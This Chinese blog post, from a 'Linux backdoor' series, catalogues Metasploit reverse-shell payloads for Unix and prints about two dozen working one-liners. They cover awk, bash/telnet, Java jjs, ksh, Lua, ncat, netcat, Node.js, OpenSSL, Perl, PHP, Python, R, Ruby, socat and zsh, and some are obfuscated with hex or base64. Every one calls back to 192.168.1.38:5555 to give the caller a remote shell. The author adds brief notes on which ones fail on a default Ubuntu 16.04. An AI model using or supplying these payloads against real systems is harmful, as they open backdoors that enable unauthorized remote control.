msf反弹一把梭 | Linux后门系列
msf 中有很多 payload ,我们来看一下可以用来unix 中反弹shell的paylaod
切换到 msf 目录
./msfvenom -l payloads | grep 'cmd/unix/reverse'
挨个瞅瞅
- cmd/unix/reverse_awk
awk 'BEGIN{s="/inet/tcp/0/192.168.1.38/5555";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
在Ubuntu 16.04 上 awk 命令执行默认命令会失败,我看网络上大家都是用 centos 来进行反弹的;gawk 命令在 Ubuntu 16.04 中并不是默认命令,需要安装,违背我之前的想法
- cmd/unix/reverse_bash
这个就没啥好测试的了,前面文章我们测试的要比这个多得多
- cmd/unix/reverse_bash_telnet_ssl
mkfifo hoDXPErDo && telnet -z verify=0 192.168.1.38 5555 0<hoDXPErDo | $(which $0) 1>hoDXPErDo & sleep 10 && rm hoDXPErDo &
可以看到 Ubuntu 16.04 自带的 telnet 中没有 -z
选项,执行失败,不知道是否centos上面可以执行
- cmd/unix/reverse_bash_udp
不说了,不说了,记得用 sh
- cmd/unix/reverse_jjs
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIFByb2Nlc3NCdWlsZGVyPUphdmEudHlwZSgiamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIik7dmFyIHA9bmV3IFByb2Nlc3NCdWlsZGVyKCIvYmluL3NoIikucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzcz1KYXZhLnR5cGUoImphdmEubmV0LlNvY2tldCIpO3ZhciBzPW5ldyBzcygiMTkyLjE2OC4xLjM4Iiw1NTU1KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7SmF2YS50eXBlKCJqYXZhLmxhbmcuVGhyZWFkIikuc2xlZXAoNTApO3RyeXtwLmV4aXRWYWx1ZSgpO2JyZWFrO31jYXRjaChlKXt9fTtwLmRlc3Ryb3koKTtzLmNsb3NlKCk7')));"|jjs
可以看到,想要使用 jjs 来进行反弹shell,那就需要安装java 环境, Ubuntu 16.04 中没有安装java环境
- cmd/unix/reverse_ksh
ksh -c 'ksh >/dev/tcp/192.168.1.38/5555 2>&1 <&1'
ksh 在 Ubuntu 16.04 中没有自带 KSH
- cmd/unix/reverse_lua
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.38',5555);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
不用想,Ubuntu 16.04 中不可能自带Lua,别问我为什么这么肯定
- cmd/unix/reverse_ncat_ssl
ncat -e /bin/sh --ssl 192.168.1.38 5555
ncat 是 Nmap的一个组件,默认 Ubuntu 16.04 中是没有的
- cmd/unix/reverse_netcat
mkfifo /tmp/gbiwa; nc 192.168.1.38 5555 0</tmp/gbiwa | /bin/sh >/tmp/gbiwa 2>&1; rm /tmp/gbiwa
参照之前nc 反弹shell的文章
- cmd/unix/reverse_netcat_gaping
- cmd/unix/reverse_nodejs
node -e 'eval("x20x28x66x75x6ex63x74x69x6fx6ex28x29x7bx20x76x61x72x20x72x65x71x75x69x72x65x20x3dx20x67x6cx6fx62x61x6cx2ex72x65x71x75x69x72x65x20x7cx7cx20x67x6cx6fx62x61x6cx2ex70x72x6fx63x65x73x73x2ex6dx61x69x6ex4dx6fx64x75x6cx65x2ex63x6fx6ex73x74x72x75x63x74x6fx72x2ex5fx6cx6fx61x64x3bx20x69x66x20x28x21x72x65x71x75x69x72x65x29x20x72x65x74x75x72x6ex3bx20x76x61x72x20x63x6dx64x20x3dx20x28x67x6cx6fx62x61x6cx2ex70x72x6fx63x65x73x73x2ex70x6cx61x74x66x6fx72x6dx2ex6dx61x74x63x68x28x2fx5ex77x69x6ex2fx69x29x29x20x3fx20x22x63x6dx64x22x20x3ax20x22x2fx62x69x6ex2fx73x68x22x3bx20x76x61x72x20x6ex65x74x20x3dx20x72x65x71x75x69x72x65x28x22x6ex65x74x22x29x2cx20x63x70x20x3dx20x72x65x71x75x69x72x65x28x22x63x68x69x6cx64x5fx70x72x6fx63x65x73x73x22x29x2cx20x75x74x69x6cx20x3dx20x72x65x71x75x69x72x65x28x22x75x74x69x6cx22x29x2cx20x73x68x20x3dx20x63x70x2ex73x70x61x77x6ex28x63x6dx64x2cx20x5bx5dx29x3bx20x76x61x72x20x63x6cx69x65x6ex74x20x3dx20x74x68x69x73x3bx20x76x61x72x20x63x6fx75x6ex74x65x72x3dx30x3bx20x66x75x6ex63x74x69x6fx6ex20x53x74x61x67x65x72x52x65x70x65x61x74x28x29x7bx20x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x20x3dx20x6ex65x74x2ex63x6fx6ex6ex65x63x74x28x35x35x35x35x2cx20x22x31x39x32x2ex31x36x38x2ex31x2ex33x38x22x2cx20x66x75x6ex63x74x69x6fx6ex28x29x20x7bx20x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x2ex70x69x70x65x28x73x68x2ex73x74x64x69x6ex29x3bx20x69x66x20x28x74x79x70x65x6fx66x20x75x74x69x6cx2ex70x75x6dx70x20x3dx3dx3dx20x22x75x6ex64x65x66x69x6ex65x64x22x29x20x7bx20x73x68x2ex73x74x64x6fx75x74x2ex70x69x70x65x28x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x29x3bx20x73x68x2ex73x74x64x65x72x72x2ex70x69x70x65x28x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x29x3bx20x7dx20x65x6cx73x65x20x7bx20x75x74x69x6cx2ex70x75x6dx70x28x73x68x2ex73x74x64x6fx75x74x2cx20x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x29x3bx20x75x74x69x6cx2ex70x75x6dx70x28x73x68x2ex73x74x64x65x72x72x2cx20x63x6cx69x65x6ex74x2ex73x6fx63x6bx65x74x29x3bx20x7dx20x7dx29x3bx20x73x6fx63x6bx65x74x2ex6fx6ex28x22x65x72x72x6fx72x22x2cx20x66x75x6ex63x74x69x6fx6ex28x65x72x72x6fx72x29x20x7bx20x63x6fx75x6ex74x65x72x2bx2bx3bx20x69x66x28x63x6fx75x6ex74x65x72x3cx3dx20x31x30x29x7bx20x73x65x74x54x69x6dx65x6fx75x74x28x66x75x6ex63x74x69x6fx6ex28x29x20x7bx20x53x74x61x67x65x72x52x65x70x65x61x74x28x29x3bx7dx2cx20x35x2ax31x30x30x30x29x3bx20x7dx20x65x6cx73x65x20x70x72x6fx63x65x73x73x2ex65x78x69x74x28x29x3bx20x7dx29x3bx20x7dx20x53x74x61x67x65x72x52x65x70x65x61x74x28x29x3bx20x7dx29x28x29x3b");'
看着架势似乎是利用 nodejs 执行了一段shellcode
Ubuntu 16.04 没有自带 nodejs
- cmd/unix/reverse_openssl
sh -c '(sleep 3797|openssl s_client -quiet -connect 192.168.1.38:5555|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 >/dev/null 2>&1 &)'
这个payload 与我们之前的用的openssl不太一样,不过大同小异
很好,又找到一个openssl的变形shell
- cmd/unix/reverse_perl
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.38:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
可以看到执行失败了,原因是 IO 这个库有问题,如果想用perl反弹shell可以参照之前的文章
- cmd/unix/reverse_perl_ssl
perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"192.168.1.38:5555",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
- cmd/unix/reverse_php_ssl
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.1.38:5555",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("n",$o);$o.="n";fputs($s,$o);}}'&
问题同样
- cmd/unix/reverse_python
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsICAgICAgIHN1YnByb2Nlc3MgICAgLCAgICAgICBvcyAgICAgICAgOyAgIGhvc3Q9IjE5Mi4xNjguMS4zOCIgICAgICAgIDsgICBwb3J0PTU1NTUgICAgICAgIDsgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgcy5jb25uZWN0KChob3N0ICAgICwgICAgICAgcG9ydCkpICAgICAgICA7ICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAgMCkgICAgICAgIDsgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgICAgICAxKSAgICAgICAgOyAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgICAgIDIpICAgICAgICA7ICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
Ubuntu 16.04 默认python3,而payload 是针对 python2 版本的,具体可以参照之前的python3章节
- cmd/unix/reverse_python_ssl
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS4zOCcsNTU1NSkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpoWT1GYWxzZQp3aGlsZSBub3QgaFk6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCWhZID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK'.decode('base64'))" >/dev/null 2>&1 &
问题同样
- cmd/unix/reverse_r
R -e "s<-socketConnection(host='192.168.1.38',port=5555,blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines(pipe(readLines(s, 1))),s)}"
r 语言默认也是没有安装的
- cmd/unix/reverse_ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.38","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby Ubuntu 16.04 也是没有安装的
- cmd/unix/reverse_ruby_ssl
ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("192.168.1.38","5555")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end'
原因同上
- cmd/unix/reverse_socat_udp
socat udp-connect:192.168.1.38:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
Ubuntu 16.04 默认没有安装socat
- cmd/unix/reverse_ssl_double_telnet
sh -c '(sleep 4119|telnet -z 192.168.1.38 5555|while : ; do sh && break; done 2>&1|telnet -z 192.168.1.38 5555 >/dev/null 2>&1 &)'
telnet 没有 -z 选项,下一个
- cmd/unix/reverse_stub
Creates an interactive shell through an inbound connection (stub only, no payload)
上面是这个payload的描述,这个payload不生成反弹命令,我搜索了国内国外文章也没找到解释
经过测试,似乎这个就是一个nc的监听功能,就是说在 exploit/multi/handler 中可以设置,可以用来接受 bash,python3等反弹回来的shell,监听openssl和meterpreter 会失败
- cmd/unix/reverse_zsh
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.38 5555 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
默认也没有安装zsh,不过zsh 很多发行版都是默认安装的
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Discourse CentOS 8 全新安装手册
- 3分钟短文:Laravel路子真野啊!路由昵称前缀中间件
- CSS中重要的BFC概念
- Redis哨兵集群中哨兵挂了,主从库还能切换吗?
- 你的 Redis 为什么变慢了?
- 解决Maven依赖冲突的好帮手,这款IDEA插件了解一下?
- Python爬虫实现HTTP网络请求多种实现方式
- 在tensorflow以及keras安装目录查询操作(windows下)
- Python调用OpenCV实现图像平滑代码实例
- php微信公众号开发之音乐信息
- Laravel关联模型中过滤结果为空的结果集(has和with区别)
- php微信公众号开发之二级菜单
- django中的ajax组件教程详解
- php微信公众号开发之校园图书馆
- 查看keras的默认backend实现方式